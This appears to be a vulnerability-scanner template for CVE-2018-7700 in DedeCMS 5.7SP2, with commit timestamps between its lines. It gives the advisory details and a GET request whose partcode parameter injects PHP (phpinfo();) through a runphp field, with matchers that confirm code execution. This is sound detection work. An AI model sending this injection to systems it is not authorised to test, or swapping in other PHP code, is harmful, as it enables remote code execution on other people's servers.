2021-03-15 08:15:21 +00:00
id : CVE-2018-7700
info :
2022-06-16 18:20:22 +00:00
name : DedeCMS 5.7SP2 - Cross-Site Request Forgery/Remote Code Execution
2021-03-15 08:15:21 +00:00
author : pikpikcu
severity : high
2022-06-20 16:19:17 +00:00
description : |
DedeCMS 5.7SP2 is susceptible to cross-site request forgery with a corresponding impact of arbitrary code execution because the partcode parameter in a tag_test_action.php request can specify a runphp field in conjunction with PHP code.
2022-04-22 10:38:41 +00:00
reference :
- https://laworigin.github.io/2018/03/07/CVE-2018-7700-dedecms%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/
2022-06-16 18:20:22 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-7700
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 8.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2018-7700
cwe-id : CWE-352
2022-04-22 10:38:41 +00:00
tags : cve,cve2018,dedecms,rce
2021-03-15 08:15:21 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}phpinfo();{/dede:field}"
matchers-condition : and
matchers :
- type : word
2022-06-20 16:19:17 +00:00
part : body
2021-03-15 08:15:21 +00:00
words :
- "phpinfo"
- "PHP Version"
condition : and
- type : status
status :
- 200
2022-06-16 18:20:22 +00:00
# Enhanced by mp on 2022/06/16